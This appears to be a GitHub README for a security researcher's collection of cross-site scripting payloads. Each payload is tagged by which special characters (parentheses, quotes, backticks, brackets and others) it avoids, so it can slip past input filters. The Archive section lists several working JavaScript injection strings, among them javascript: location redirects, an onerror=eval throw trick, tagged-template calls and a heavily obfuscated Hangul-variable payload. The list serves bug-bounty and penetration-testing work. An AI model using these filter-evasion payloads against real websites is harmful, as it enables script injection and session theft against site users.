Skip to content
XSS Payload without Anything.
Branch: master
Clone or download
Latest commit 3b51ae0 Jun 28, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Update README.md Jun 28, 2019

README.md

XSS-Payload-without-Anything

XSS Payload without Anything.

What is XSS Payload without Anything

When I work for a company or bug bounty, the unexpected hurdle is a protection(xss filter) of special char in the JS(Javascript) area. So I am devising a way to easily solve these problems, and one of the processes is this document.

Let's collect a lot of thoughts and solve our problems.

Concept

It is similar to "Payload all the things" in terms of collecting the payload, but I want to provide a list of payloads with special tag (without char, used char, other..) I plan to make it easy to search and to show what characters (or what they are made of) are unusable.

format

without char: () , '

XSS Payload

// usedchar: 
// author: 
// description: 

without char (Frequently filtered characters)

I have selected special characters that are often blocked.

( ) 
{ } 
, 
"
'
`
[ ]
\ 
/ 
; 
+ 
. 
=

(template): () {} , " ' backtick [] \ / ; + . =

Usage

on Github.com

  1. Ctrl + F >
  2. find your problem char
  3. XSS

on hahwul.com comming soon

Awesome payload

coming soon

Archive

without char: () , " backtick \ / [] {} .

location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]

without char: () {} , " backtick [] / + .

onerror=eval;throw'alert\x2845\x29';

without char: !backtick

prompt`45`

without char: () {} , " backtick``[] / ; + .

location='javaScriPt:alert\x2845\x29'

without char: " backtick \ / ; .

([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()

without char: {} , " ' backtick \ / ; + =

[45].some.alert()

without char: () {} , " ' [] \ / ; + =

Set.constructor`alert\x2845\x29`

Submit XSS Payloads

Add issue form or pull Request

XSS Payload:
WithOut: 
Description: 

or ...

Tweet with me @hahwul

You can’t perform that action at this time.